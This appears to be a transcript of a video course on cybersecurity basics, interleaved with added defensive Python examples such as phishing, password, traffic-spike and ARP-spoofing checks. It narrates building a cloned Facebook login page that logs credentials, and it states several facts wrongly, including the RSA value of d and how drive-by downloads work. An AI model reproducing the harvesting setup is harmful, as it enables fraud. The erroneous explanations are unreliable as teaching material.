So let's go and actually fill up these numbers. So n should be 35 out here, and if we generate them we get the value of phi, which is 24, which is basically 4 into 6, and then we should also get e. Now e should be co-prime, so we are going to give it 11, as 11 is co-prime to both. So now for the actual encryption part we have to put in e and n out here; so e out here for us is 11 and n is 35, and then we are going to pick a letter to actually cipher, which is "a", and then we're going to encode it as a number. So as you guys can see, we've encoded it as 1 out here. Now, after we've given the message its numerical form, we click on encryption and we get it. Now to actually decrypt the message, we are going to need d and n. Now d for us was 5 and n was 35, so 5 and 35, and then we're going to take the encrypted message from above and we're going to decrypt this message. So after you decrypt it, we have the numerical form of the plaintext, and then to decode the message, click here on decode message. And as you guys can see, we have decoded the message using RSA.
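Textbook RSA with the course's toy parameters p = 5, q = 7 and e = 11 (so n = 35 and phi = 24), as an added example standing in for both the public key demo site and the RSA web tool shown above; this is not the tool's code. Here d is derived from e and phi with the extended Euclidean algorithm (with these numbers it comes out as 11), and letters are encoded a = 1 ... z = 26 as in the demo.

```python
"""Textbook RSA key generation, encryption and decryption (added example)."""
from math import gcd


def is_prime(x: int) -> bool:
    """Trial division; fine for the toy primes used here."""
    if x < 2:
        return False
    return all(x % f for f in range(2, int(x ** 0.5) + 1))


def egcd(a: int, b: int) -> tuple[int, int, int]:
    """Extended Euclid: returns (g, x, y) with a*x + b*y == g == gcd(a, b)."""
    if b == 0:
        return a, 1, 0
    g, x, y = egcd(b, a % b)
    return g, y, x - (a // b) * y


def modinv(e: int, phi: int) -> int:
    """d such that (e * d) % phi == 1; exists only when gcd(e, phi) == 1."""
    g, x, _ = egcd(e, phi)
    if g != 1:
        raise ValueError("e and phi are not co-prime, no inverse exists")
    return x % phi


def keygen(p: int, q: int, e: int):
    """Return ((n, e), (n, d)): the public key and the private key."""
    if not (is_prime(p) and is_prime(q)) or p == q:
        raise ValueError("p and q must be distinct primes")
    n = p * q
    phi = (p - 1) * (q - 1)
    if not 1 < e < phi or gcd(e, phi) != 1:
        raise ValueError("e must satisfy 1 < e < phi and gcd(e, phi) == 1")
    return (n, e), (n, modinv(e, phi))


def encode(text: str) -> list[int]:
    """a=1 ... z=26, as the demo encodes letters; other characters are dropped."""
    return [ord(ch) - ord("a") + 1 for ch in text.lower() if "a" <= ch <= "z"]


def decode(numbers: list[int]) -> str:
    return "".join(chr(m + ord("a") - 1) for m in numbers)


def encrypt(numbers: list[int], public_key: tuple[int, int]) -> list[int]:
    n, e = public_key
    if any(not 0 <= m < n for m in numbers):
        raise ValueError("every message block must be smaller than n")
    return [pow(m, e, n) for m in numbers]          # c = m^e mod n


def decrypt(blocks: list[int], private_key: tuple[int, int]) -> list[int]:
    n, d = private_key
    return [pow(c, d, n) for c in blocks]           # m = c^d mod n


if __name__ == "__main__":
    public, private = keygen(5, 7, 11)       # n = 35, phi = 24, d = 11
    msg = encode("hi there")
    ct = encrypt(msg, public)
    print(public, private, ct)
    print(decode(decrypt(ct, private)))      # hithere
    # Textbook RSA is deterministic: the repeated letters in "there" encrypt to
    # identical blocks, so an observer can spot repeats. Real systems therefore
    # add randomized padding (OAEP) before the exponentiation.
```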

So guys, that's how RSA works. I explained all the factors that we actually use in RSA, from n to phi to e to d, and I hope you understood a part of it. If y'all are still more interested, y'all can actually research a lot on RSA; it's a very in-depth cryptography system.

Just as pollution was a side effect of the Industrial Revolution, so are the many security vulnerabilities that come with increased internet connectivity. Cyber attacks are exploitations of those vulnerabilities. For the most part, individuals and businesses have found ways to counter cyber attacks using a variety of security measures, and just good old common sense. We are going to examine eight of the most common cyber security threats that your business could face and the ways to avoid them. So before we actually jump into the session, let me give you how the session will actually work. We are going to discuss the 8 most common cyber threats. We're going to discuss in particular what they are, how the threat works, and how to protect yourself.

Okay. So now let's jump in. Now cyber attacks are taking place all the time. Even as we speak, the security of some organization, big or small, is being compromised.

For example, if you visit this site out here, that is ThreatCloud, you can actually view all the cyber attacks that are actually happening right now. Let me just give you a quick demonstration of how that looks. Okay, so as you guys can see out here, these are all the places that are being compromised right now. The red parts actually show us the place that is being compromised, and the yellow places actually show us where it's being compromised from. Okay, as you guys can see now, someone from one place on the map is actually attacking this place, and someone from the USA was attacking Mexico. It's a pretty interesting site and actually gives you a scale of how many cyber attacks are actually happening all the time in the world. Okay, now getting back, I think looking at all these types of cyber attacks, it's only necessary that we educate ourselves about all the types of cyber threats that we have. So these are the eight cyber threats that we're going to be discussing today. Firstly, we're going to start off with malware.

So malware is an all-encompassing term for a variety of cyber attacks, including Trojans, viruses and worms. Malware is simply defined as code with malicious intent that typically steals data or destroys something on the computer. The way malware goes about doing its damage can be helpful in categorizing what kind of malware you're dealing with. So let's discuss it.

So first of all, viruses: like their biological namesakes, viruses attach themselves to clean files and infect other clean files, and they can spread uncontrollably, damaging a system's core functionality and deleting or corrupting files. They usually appear as executable files that you might have downloaded from the internet. Then there are also Trojans. Now this kind of malware disguises itself as legitimate software, or is included in legitimate software that has been tampered with. It tends to act discreetly and creates back doors in your security to let other malware in. Then we have worms. Worms infect entire networks of devices, either local or across the internet, by using the network's interfaces; each consecutively infected machine is used to infect more. And then we have botnets and such, where botnets are networks of infected computers that are made to work together under the control of an attacker. So basically you can encounter malware if you have some OS vulnerabilities, or if you download some legitimate software from somewhere, or you have some email attachment that was compromised.

Okay. So how exactly do you remove malware, or how exactly do you fight against it? Well, each form of malware has its own way of infecting and damaging computers and data, and so each one requires a different malware removal method. The best way to prevent malware is to avoid clicking on links or downloading attachments from unknown senders. And this is sometimes done by deploying a robust and updated firewall, which prevents the transfer of large data files over the network in the hope of weeding out attachments that may contain malware. It's also important to make sure your computer's operating system, whether it be Windows, Mac OS or Linux, uses the most up-to-date security updates. Software programmers update programs frequently to address any holes or weak points, and it's important to install all these updates as well, so as to decrease your own system's weaknesses.

So next up on our list of cyber threats we have phishing. So what exactly is phishing? Well, often posing as a request for data from a trusted third party, phishing attacks are sent via email and ask users to click on a link and enter their personal data. Phishing emails have gotten much more sophisticated in recent years, making it difficult for some people to discern a legitimate request for information from a false one. Now phishing emails often fall into the same category as spam, but are way more harmful than just a simple ad.

So how exactly does phishing work? Well, most people associate phishing with email messages that spoof or mimic banks, credit card companies or other businesses like Amazon, eBay and Facebook. These messages look authentic and attempt to get victims to reveal their personal information. But email messages are only one small piece of a phishing scam. From beginning to end, the process involves five steps. The first step is planning: the phisher must decide which business to target and determine how to get email addresses for the customers of that business. Then they must go through the setup phase: once they know which business to spoof and who their victims are, phishers create methods for delivering the messages and collecting the data. Then they have to execute the attack, and this is the step most people are familiar with: the phisher sends the phony message that appears to be from a reputable source. After that, the phisher records the information the victims enter into the web page or pop-up windows. And in the last step, which is basically identity theft and fraud, the phishers use the information they've gathered to make illegal purchases or otherwise commit fraud, and as many as 1/4 of the victims never fully recover.

So how exactly can you actually prevent yourself from getting phished? Well, the only thing that you can do is be aware of how phishing emails actually work. So first of all, a phishing email has some very specific properties. Firstly, you will have something like a very generalized way of addressing someone, like "Dear client". Then your message will not actually be from a very reputable source; so out here, as you can see, it's written as Amazon on the label, but if you actually inspect the email address that it came from, it's from "management at Maison Canada dot CA", which is not exactly a legitimate Amazon address. Third, you can actually hover over the redirect links and see where they actually redirect you to. Now this redirects me to "www.facebook.com zone.com", as you can see out here. So basically, you know this is actually a phishing email, and you should actually report this email to your administrators or anybody else that you think is supposed to be concerned with this.

Also, let me give you guys a quick demonstration of how phishing actually works from the perspective of an attacker. So first of all, I have actually created a phishing website for harvesting Facebook credentials. I simply just took the source code of the Facebook login page and pasted it, and then made a back-end code in PHP which makes a log file of all the Facebook passwords that actually get entered onto the phishing page. Now I've also sent myself an email so as to make sure this looks legitimate, but this is only for spreading awareness. So please don't use this method for actually harvesting credentials; that's actually a very illegal thing to do.

So, let's get started. First of all, you will go to your email and see that you'll get some emails saying your Facebook credentials have been compromised. So when you open it, it looks pretty legit. Well, I haven't made it look all that legit; it should look legit, but the point out here is to actually make you aware of how this works. So as you guys can see, it says "Dear client, we have strong reasons to believe that your credentials may have been compromised and might have been used by someone else. We have locked your Facebook account. Please click here to unlock. Sincerely, Facebook associate Dean." So if we actually click here, we are actually redirected to a nice-looking Facebook page, which is exactly how Facebook looks when you're logging in. Now suppose I were to actually log into my Facebook account, which I won't; I'll just use some random address, like "this is an email address" at gmail.com, and let's put the password as admin123, and we click login. Now since my Facebook is actually already logged in, it will just redirect to facebook.com and you might just see me logged in, but on a normal computer it will just redirect you to www.facebook.com, which should just show this site again.

Okay. So once I click login out here, all that the back-end code that I've written in PHP out here will do is take all the parameters that I have entered into this website, that is my email address and the password, and just generate a log file about it. So let's just hit login and see what happens. So as you guys can see, I've been redirected to the original Facebook page, the one that is not meant for phishing, and on my system out here I have a log file, and this log file will show, exactly as you can see, that it has fished out the email address, "this is an email address" at gmail.com, and it has also showed the password, that is admin123. So this is exactly how phishing works: you enter an email address, and you're entering the email address on a phishing website, and then it just redirects you to the original site. But by this time you've already compromised your credentials. So always be careful when dealing with such emails.
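A defender-side check for the three tells listed above (a generic greeting, a From address that does not belong to the brand in the display name, and links whose host is a look-alike), as an added example run over a constructed message modelled on the one in the demo; this is not code from the course, and the domains are reserved test names rather than the real ones.

```python
"""Flag the phishing tells described above in a raw e-mail (added example)."""
import email
from email import policy
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample modelled on the "Dear client ... click here to unlock"
# message in the demo. All domains are reserved test names.
SUSPICIOUS = """\
From: "Amazon Customer Care" <management@amazon-canada.test>
To: someone@example.test
Subject: Your account has been locked
Content-Type: text/html

<html><body><p>Dear client,</p>
<p>We have strong reasons to believe your credentials may have been compromised.
Please <a href="http://www.amazon.com.zone.test/unlock">click here</a> to unlock.</p>
<p>Sincerely, Amazon associate</p></body></html>
"""

# Constructed benign message for comparison.
LEGITIMATE = """\
From: "Example Corp Billing" <billing@example.test>
To: someone@example.test
Subject: Your March invoice
Content-Type: text/html

<html><body><p>Hi Aarya,</p>
<p>Your invoice is ready: <a href="https://example.test/invoices/42">view it</a>.</p>
</body></html>
"""

GENERIC_GREETINGS = ("dear client", "dear customer", "dear user", "dear member")
# Brand word -> the registrable domain that brand really uses (constructed table).
BRANDS = {"amazon": "amazon.com", "facebook": "facebook.com", "ebay": "ebay.com"}


class LinkCollector(HTMLParser):
    """Collect (href, anchor text) for every <a> in the HTML body."""

    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href", ""), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def registrable_domain(host: str) -> str:
    """Last two labels of a hostname (enough for .com/.test; production code
    should consult the public suffix list for names like .co.uk)."""
    return ".".join(host.lower().split(".")[-2:])


def analyse(raw_message: str) -> list[str]:
    msg = email.message_from_string(raw_message, policy=policy.default)
    findings = []
    display, addr = parseaddr(str(msg["From"]))
    sender_domain = addr.rsplit("@", 1)[-1].lower()
    # 1. Display name names a brand, but the sender domain is not that brand's.
    for brand, domain in BRANDS.items():
        if brand in display.lower() and registrable_domain(sender_domain) != domain:
            findings.append(f"sender {addr} is not a {domain} address")
    body = msg.get_body(preferencelist=("html", "plain"))
    text = body.get_content() if body else ""
    # 2. Generic greeting instead of the customer's name.
    if any(g in text.lower() for g in GENERIC_GREETINGS):
        findings.append("generic greeting")
    # 3. Link host contains a brand name but is registered under another domain.
    collector = LinkCollector()
    collector.feed(text)
    for href, anchor in collector.links:
        host = urlparse(href).hostname or ""
        for brand, domain in BRANDS.items():
            if brand in host and registrable_domain(host) != domain:
                findings.append(f"'{anchor}' points at look-alike host {host}")
    return findings


if __name__ == "__main__":
    print(analyse(SUSPICIOUS))   # three findings
    print(analyse(LEGITIMATE))   # []
```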

So now, jumping back to our session, the next type of cyber attack we're going to discuss is password attacks. So an attempt to obtain or decrypt a user's password for illegal use is exactly what a password attack is. Hackers can use cracking programs, dictionary attacks and password sniffers in password attacks. Password cracking refers to various measures used to discover computer passwords. This is usually accomplished by recovering passwords from data stored in or transported from a computer system. Password cracking is done by repeatedly guessing the password, usually through a computer algorithm in which the computer tries numerous combinations until the password is successfully discovered. Now password attacks can be done for several reasons, but the most malicious reason is in order to gain unauthorized access to a computer without the computer owner's awareness. This results in cyber crime such as stealing passwords for the purpose of accessing bank information.

Now today there are three common methods used to break into a password-protected system. The first is a brute force attack: a hacker uses a computer program or script to try to log in with possible password combinations, usually starting with the easiest-to-guess passwords. So just think: if a hacker has a company list, he or she can easily guess usernames. If even one of the users has a password like 123, he will quickly be able to get in. The next are dictionary attacks. Now a hacker uses a program or script to try to log in by cycling through combinations of common words. In contrast with brute force attacks, where a large proportion of the key space is searched systematically, a dictionary attack tries only those possibilities which are most likely to succeed, typically derived from a list of words, for example a dictionary. Generally, dictionary attacks succeed because most people have a tendency to choose passwords which are short, such as single words found in dictionaries, or simple, easily predicted variations on words, such as appending a digit or so. Now the last kind of password attack is the keylogger attack: a hacker uses a program to track all of the user's keystrokes, so at the end of the day everything the user has typed, including the login IDs and passwords, has been recorded. A keylogger attack is different from a brute force or dictionary attack in many ways, not the least of which is that the keylogging program used is malware that must first make it onto the user's device. Keylogger attacks are also different because stronger passwords don't provide much protection against them, which is one reason that multi-factor authentication is becoming a must-have for all businesses and organizations.

Now, the only way to stop yourself from getting killed in the whole password attack conundrum is by actually practicing the best practices that are being discussed in the whole industry about passwords. So basically, you should update your password regularly, you should use alphanumerics in your password, and you should never use words that are actually in the dictionary. It's always advisable to use garbage words that make no sense for passwords, as that just increases your security.
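A policy check that encodes the advice above (length, mixed letters and digits, and no dictionary word even with the usual digit appended or leet substitutions), as an added example rather than anything from the course; the word list is a constructed stand-in for a real cracking dictionary.

```python
"""Check a candidate password against the practices described above (added example)."""
import re

# Constructed stand-in for a cracking dictionary; real checks use far larger lists.
WORDLIST = {"password", "welcome", "admin", "letmein", "summer", "dragon", "company"}
# Common leet-speak substitutions an attacker's rule set undoes.
LEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a", "5": "s",
                      "7": "t", "@": "a", "$": "s"})


def candidate_words(password: str) -> set[str]:
    """Forms a dictionary attack's mangling rules would try: lower-cased,
    digits/symbols stripped from either end, and leet-speak undone."""
    lower = password.lower()
    stripped = re.sub(r"^[\d\W_]+|[\d\W_]+$", "", lower)
    return {lower, stripped, lower.translate(LEET), stripped.translate(LEET)}


def check_password(password: str, wordlist=WORDLIST, min_len: int = 12) -> list[str]:
    """Return the list of policy problems; an empty list means the password passes."""
    problems = []
    if len(password) < min_len:
        problems.append(f"shorter than {min_len} characters")
    if not (re.search(r"[a-zA-Z]", password) and re.search(r"\d", password)):
        problems.append("not alphanumeric (needs both letters and digits)")
    if candidate_words(password) & wordlist:
        problems.append("dictionary word, possibly with digits appended or leet substitutions")
    return problems


if __name__ == "__main__":
    for pw in ("admin123", "P@ssw0rd1", "correcthorsebattery", "xk7Qm2pLw9vRt4"):
        print(pw, "->", check_password(pw) or "ok")
```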

So moving on, we're going to discuss DDoS attacks. So what exactly is a DDoS or a DoS attack? Well, first of all, it stands for distributed denial of service, and a DoS attack focuses on disrupting the service to a network. As the name suggests, attackers send a high volume of data or traffic through the network until the network becomes overloaded and can no longer function. So there are a few different ways attackers can achieve a DoS attack, but the most common is the distributed denial-of-service attack. This involves the attacker using multiple computers to send the traffic or data that will overload the system. In many instances, a person may not even realize that his or her computer has been hijacked and is contributing to the DoS attack. Now disrupting services can have serious consequences relating to security and online access. Many instances of large-scale DoS attacks have been implemented as a single sign of protest towards governments or individuals and have led to severe punishment, including major jail time.

So how can you prevent DoS attacks against yourself? Well, firstly, unless your company is huge, it's rare that you would even be targeted by an outside group of attackers for a DoS attack. Your site or network could still fall victim to one, however, if another organization on your network is targeted. Now the best way to prevent an additional breach is to keep your system as secure as possible, with regular software updates, online security monitoring, and monitoring of your data flow to identify any unusual or threatening spikes in traffic before they become a problem. DoS attacks can also be perpetrated by simply cutting a cable or dislodging a plug that connects your website server to the internet, so due diligence in physically monitoring your connections is recommended as well.
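The "monitor your data flow for threatening spikes" advice above, as an added example (not code from the course): per-second request counts from a web server access log are compared with the median rate, and each alert reports how many distinct sources drove the spike, which separates one noisy client from a distributed flood. The log lines are constructed; the addresses are from documentation ranges.

```python
"""Spot traffic spikes in a web server access log (added example)."""
import re
from collections import defaultdict
from statistics import median

# Common Log Format, e.g.  10.0.0.5 - - [10/Oct/2023:13:55:00 +0000] "GET / HTTP/1.1" 200 512
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) (?P<size>\d+|-)$'
)


def requests_per_second(lines):
    """Map each timestamp (CLF has second resolution) to the list of client IPs."""
    buckets = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            buckets[m.group("ts")].append(m.group("ip"))
    return buckets


def detect_spikes(lines, factor=5.0, min_requests=20):
    """Alert on any second whose request count is both above an absolute floor
    and `factor` times the median rate. The median is robust to the spike
    itself, so the baseline is not dragged up by the attack it should catch."""
    buckets = requests_per_second(lines)
    counts = [len(ips) for ips in buckets.values()]
    baseline = median(counts) if counts else 0
    alerts = []
    for ts, ips in sorted(buckets.items()):
        if len(ips) >= min_requests and len(ips) > factor * baseline:
            alerts.append({"second": ts, "requests": len(ips), "sources": len(set(ips))})
    return alerts


def sample_log():
    """Constructed log: six quiet seconds with two requests each, then one
    second with 40 requests from 20 different addresses."""
    lines = []
    for sec in range(6):
        for host in (1, 2):
            lines.append(f'10.0.0.{host} - - [10/Oct/2023:13:55:0{sec} +0000] "GET / HTTP/1.1" 200 512')
    for i in range(40):
        lines.append(f'198.51.100.{i % 20 + 1} - - [10/Oct/2023:13:55:06 +0000] "GET /login HTTP/1.1" 200 512')
    return lines


if __name__ == "__main__":
    for alert in detect_spikes(sample_log()):
        print(alert)   # {'second': '10/Oct/2023:13:55:06 +0000', 'requests': 40, 'sources': 20}
```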

Okay. So next up on our list is man-in-the-middle attacks. So by impersonating the endpoints in an online information exchange, the man in the middle can obtain information from the end user and the entity he or she is communicating with. For example, if you are banking online, the man in the middle would communicate with you by impersonating your bank, and communicate with the bank by impersonating you. The man in the middle would then receive all of the information transferred between both parties, which could include sensitive data such as bank accounts and personal information.

So how does it exactly work? Normally, an MITM gains access through an unencrypted wireless access point, which is basically one that doesn't use WEP, WPA or any of the other security measures. Then they would access all the information being transferred between both parties by actually spoofing something called the Address Resolution Protocol (ARP). That is the protocol that is used when you are actually connecting to your gateway from your computer.

So how can you exactly prevent MITM attacks from happening against you? Firstly, you have to use an encrypted WAP, that is an encrypted wireless access point. Next, you should always check the security of your connection, because when somebody is actually trying to compromise your security, he will try to actually strip down the HTTPS or HSTS that is being enforced by the website, which is basically the security protocol. So if something like this HTTPS is not appearing for your website, you're on an insecure website where your credentials or your information can be compromised. And the last and final measure that you can actually use is by investing in a virtual private network, which spoofs your entire IP, and you can just browse the internet with perfect comfort.
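Detecting the ARP spoofing described above from the defender's side, as an added example (not code from the course): the two classic indicators are an IP address whose MAC changes over time, and a single MAC that answers for several IP addresses, which is what happens when the man in the middle claims both the gateway and the victim. The observed ARP replies and the MAC addresses are constructed.

```python
"""Detect ARP spoofing from observed ARP replies (added example)."""
from collections import defaultdict

# Constructed sequence of "is-at" ARP replies seen on a LAN: (time, ip, mac).
# 192.168.1.1 is the gateway; de:ad:be:ef:00:99 is a constructed rogue MAC.
OBSERVED = [
    (1, "192.168.1.1", "aa:bb:cc:00:00:01"),
    (2, "192.168.1.10", "aa:bb:cc:00:00:10"),
    (3, "192.168.1.1", "aa:bb:cc:00:00:01"),
    (4, "192.168.1.1", "DE:AD:BE:EF:00:99"),   # gateway IP suddenly claimed by another MAC
    (5, "192.168.1.10", "de:ad:be:ef:00:99"),  # the same MAC also claims the victim's IP
]


def detect_arp_spoofing(observed, gateway_ip=None):
    """Return alerts for IP->MAC changes and for MACs that claim several IPs.
    A change on the gateway's IP is flagged separately since that is the usual
    target when traffic to the internet is redirected."""
    first_mac = {}
    ips_per_mac = defaultdict(set)
    alerts = []
    for ts, ip, mac in observed:
        mac = mac.lower()                       # normalise case before comparing
        if ip in first_mac and first_mac[ip] != mac:
            alerts.append({"kind": "mac_changed", "time": ts, "ip": ip,
                           "old": first_mac[ip], "new": mac, "gateway": ip == gateway_ip})
        first_mac.setdefault(ip, mac)
        ips_per_mac[mac].add(ip)
    for mac, ips in ips_per_mac.items():
        if len(ips) > 1:
            alerts.append({"kind": "mac_claims_many", "mac": mac, "ips": sorted(ips)})
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoofing(OBSERVED, gateway_ip="192.168.1.1"):
        print(alert)
    # Host-side mitigation: pin the gateway's MAC with a static ARP entry and keep
    # using encrypted transport (HTTPS, VPN) so a redirected flow stays unreadable.
```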

Next up on our list is drive-by downloads. So gone are the days where you had to click to accept a download or install a software update in order to become infected. Now just opening a compromised web page could allow dangerous code to install on your device. You just need to visit, or "drive by", a web page, without stopping or clicking to accept any software, and the malicious code can download in the background to your device. A drive-by download refers to the unintentional download of a virus or malicious software onto your computer or mobile device. A drive-by download will usually take advantage of, or exploit, a browser, app or operating system that is out of date and has security flaws. This initial code that is downloaded is often very small, since its job is often simply to contact another computer where it can pull down the rest of the code onto your smartphone, tablet or other computer. Often a web page will contain several different types of malicious code in the hope that one of them will match a weakness on your computer.

So how exactly does this work? First you visit the site, and during the three-way handshake connection of the TCP/IP protocol a back-end script is triggered. As soon as a connection is made, by the time the last ACK packet is sent, a download is also triggered and the malware is basically injected into your system.

Now the best advice I can share about avoiding drive-by downloads is to avoid visiting websites that could be considered dangerous or malicious. This includes adult content, file sharing websites, or anything that offers you a free trip to the Bahamas. Now some other tips to stay protected include: keep your internet browser and operating system up to date; use a safe search tool that warns you when you navigate to a malicious site; and use comprehensive security software on all your devices, like McAfee All Access, and keep it up to date. Okay, so that was it about drive-by downloads.

Next up is malvertising. So malvertising is the name we in the security industry give to criminally controlled advertisements which intentionally infect people and businesses. These can be any ad on any site, often ones which you use as a part of your everyday internet usage, and it is a growing problem, as is evident by a recent US Senate report and the establishment of bodies like Trust in Ads. Now whilst the technology being used in the background is very advanced, the way it presents to the person being infected is simple. To all intents and purposes the advertisement looks the same as any other, but has been placed by a criminal. Like you can see the ad out here: it's really out of place, so you could say it's been made by a criminal. Now without your knowledge, a tiny piece of code hidden deep in the advertisement is making your computer go to the criminals' servers. These then catalog details about your computer and its location before choosing which piece of malware to send you, and this doesn't need a new browser window, and you won't know about it. So basically you're redirected to some criminal server, an injection takes place, and voila, you're infected. It's a pretty dangerous thing to be in.

So how exactly can you stop malvertising? Well, first of all, you need to use an ad blocker, which is a must in this day and age. You can have ad blocker extensions installed on your browser, whether it be Chrome, Safari or Mozilla. Also, regular software updates of your browser and other software that works closely with your browser always help. And next is some common sense: an advertisement that is about a lottery that's offering you free money is probably going to scam you and inject malware too, so don't click on those ads.

So the last kind

of cyber attack

that we are going to discuss

today is rogue software.

So Rogue security software is


a form of malicious software

and internet fraud that misleads


users into believing

that there is a virus


on their computer

and manipulates them


into paying money

for a fake malware removal tool.

It is a form of scareware

that manipulates users through fear,

and a form of ransomware.

Rogue security software has been

a serious security threat

in desktop computing since 2008.

So now, how does rogue

security software work?

These scams manipulate users

into downloading the program

through a variety of techniques.

Some of these methods

include ads offering

free or trial versions

of security programs,

often with pricey upgrades

or encouraging the purchase

of deluxe versions;

then also pop-ups warning

that your computer

is infected with a virus,

which encourage you to clean it

by clicking on the program;

and then manipulated

SEO rankings that put

infected websites as the top hits

when you search.

These links then

redirect you to a landing page

that claims your

machine is infected

and encourages you to take a free trial

of the rogue security program.

Now, once the scareware

is installed, it can steal

all your information, slow

your computer, corrupt

your files, disable updates

for legitimate

antivirus software,

or even prevent you

from visiting legitimate

security software vendor sites.

Well, talking about prevention:

the best defense

is a good offense,

and in this case

an updated firewall.

Make sure

that you have a working

one in your office

that protects you

and your employees

from these types of attacks.

It is also a good idea

to install a trusted antivirus

or anti-spyware software program

that can detect

threats like these,

and also a general level

of distrust on the internet,

not actually believing

anything right off

the bat, is the way

to go.

Now, the keyword

of this video is

ethical hacking course,

but in reality,

it's just an expansive video


on the fundamentals

of ethical hacking.

There is no such thing

as an ethical hacking

course, to be honest,

because no course

can teach you a discipline like

ethical hacking. All the best

that you can do

when creating content

for ethical hacking is

that you can tell people

about the fundamentals

that are followed in this discipline.

Okay.

Now before we start


let me just give you

a general idea of the topics

that I intend to cover


throughout this video.

Okay now to be honest,

we're going to cover a pretty


broad range of material.

First, we're going

to be going over

footprinting and reconnaissance,

where you get an idea of

what's involved in

the ethical hacking engagement

that you're working

on, and gather information

about the target that

you're engaged with.

Then we're going to talk


about networking fundamentals

and here we're going to get

our hands dirty with packets

and the understanding

of TCP/IP at a deeper level,

and also understanding

how the different protocols work

and why they work that way.

We are also going


to be talking about cryptography

where we talk about different

cryptographic ciphers.

We're going to deal

with web encryption through SSL

and TLS. We are also going

to talk about certificates

and the creation of certificates

and how they actually

operate. We will also talk

about public key cryptography,

and we are also covering scanning

and enumeration, so nmap

and dealing with Windows servers

and using SNMP and LDAP

and all that sort of stuff.

Then we're going to be


talking about penetration,

where we deal

with different ways

of getting into systems, and also

go over using Metasploit,

which is an exploit framework,

and we're going to talk

about how to use Metasploit

to actually

get into systems

and make use of the exploits

that it has. Then we're going

to talk about malware: viruses

and worms and rootkits and all

of that sort of stuff.

We're going to take a look


at the different pieces

of malware and how you


would pull that apart

in order to understand

what it is doing and potentially

make use of that malware during

an ethical hacking engagement.

Then we're going to talk


about different types of denial

of service attacks,

or DoS attacks,

and the difference

between a denial-of-service

attack and a distributed

denial-of-service attack,

and there is a difference there.

So we're going to go

over DoS and DDoS.

We're also going to go


over web application hacking

and the types of tools

that you would use during

web application hacking and


the different vulnerabilities

that web applications have

and how to make use


of these exploits

and those vulnerabilities.

We're going to talk


about Wireless networking

how to probe wireless networks

what wireless networks are doing

and how to secure


wireless networks.

We're also going to talk

a little bit

about detection evasion.

And to be honest with you,

detection evasion kind

of comes up in a lot

of different areas

throughout many of the topics.

We're also

going to talk about

programming attacks

and how to protect oneself

against programming attacks.

Okay.

So that was the number of topics

that we are actually going


to cover through this video.

Now the approach

that I'm going to be taking


in the series of videos

is, whenever possible,

to use a hands-on approach.

So I'm going to show you

the actual tools I'm going

to make use of, and use those tools

to do some sort of demonstration

of how they actually work.


I am a big believer

in getting your hands dirty as


the best way to learn anything.

So as we go through
the series of videos,

I strongly encourage you


to get access to the tools

that I'm going to


be demonstrating wherever

possible and dig in and get


your hands dirty along with me

and there are places

where we're going to be going


over some theoretical material

and I'm not a big fan


of PowerPoint slides,

but they are a necessary evil

in order to convey

certain types of information.

So wherever possible I'm going

to minimize their use,

but you will run across places

where they're just a necessity

and we're going to have to go

through some slides

in order to get

some particular points

across that are primarily

of a theoretical nature.

So that's the process


that we will be taking

through this video


and I hope you have fun

as you go along the way.

Okay.

So let's begin now


the first topic

that we're going to tackle is:

what is hacking?

Okay, so let us take a trip

to the early days

of hacking to start

with. Now, the Internet

Engineering Task Force

is responsible for maintaining

documentation about protocols

and various specifications

and processes and procedures

regarding anything

on the internet.

They have a series of documents

called the Requests for Comments,

or the RFCs, and according

to RFC 1392,

a hacker is "a person

who delights in having

an intimate understanding

of the internal workings

of a system, computers

and computer networks

in particular." While

the expression "hacker"

may go back a long time

and have many different

connotations or definitions,

as far as computers

go,

some of the earliest

hackers were members

of the Tech Model Railroad Club

at the Massachusetts

Institute of Technology,

and what those people did

and the various things

that they were involved

in are detailed in Steven Levy's

book called Hackers.

Now, for our purposes

we'll be talking

about other types of hackers,

although the spirit of

what we do goes back

to those early days.

Now, the definition of hacking

or hackers has changed,

particularly in the 1980s,

and in part as a result

of a couple of people,

namely Robert T. Morris,

who was a Cornell graduate student

who unleashed a

piece of software

that was called a worm on

what was an early version

of the internet. The worm went

on to cause a lot of damage

and create a lot of downtime

on systems across the country

and across the world.

Now the Morris worm did end up

resulting in something good,

however: the

Computer Emergency Response Team

at Carnegie Mellon

was created primarily

in response to the Morris worm.

Now, Kevin Mitnick

was another well-known hacker

who was responsible

for various acts

of computer crime

over a couple of decades.

He was first

convicted in 1988.

So the definition of hacker

or hacking moved from something

benign to something

far more sinister.

Now we see hacking or hackers

in all sorts of popular culture.

We've seen them in hacker movies

like WarGames and, of course,

the movie Hackers.

You also see it in The Matrix

movies, where you can see,

if you look really closely,

that they are using

a tool called nmap,

which we will get into the use

of in great detail later on

as we go on. Then there's

the movie Sneakers

and the movie Swordfish,

and on television

and in other places

you can see the agents

at NCIS regularly doing

things like cracking

complex cryptography in just

a matter of seconds or minutes.

So what is hacking, really?

Well, hacking is about

a deep understanding

of something, particularly

with relation to

computers and computing.

It's also about exploring and

the joy of learning new things

and understanding

them very clearly

and being able to manipulate

those things in ways

that maybe other people

haven't before. It's all

about digging into problems

to find solutions

in creative and interesting ways,

and sometimes finding problems

where there weren't

problems previously,

and that's a little bit

about what hacking is.

Okay.

So now that we have talked

about what exactly hacking is

and how the meaning

and connotations of that word

have changed over time,

how it came into existence

and how it was coined,

let's go over the reasons

that people normally hack.

Now, you may want

to hack just for fun.

As discussed previously,

hacking is a tradition.

It goes back several decades

at MIT, even preceding

the computer-related definition

of hacking. Now, MIT has a long

and storied history of hacking,

and sometimes the hacks have

a computer-related nature,

which in this case

happens to be true,

and sometimes a

non-computer-related nature.

Now here you can see

that MIT's home page

has been hacked,

or you might even say

defaced, to indicate

that Disney is buying MIT.

This was an April Fools'

Day prank in 1998.

And again, this is just

the kind of hacking

that you would do for fun.

Now, sometimes you might want

to hack just to prove

a political point, or any point
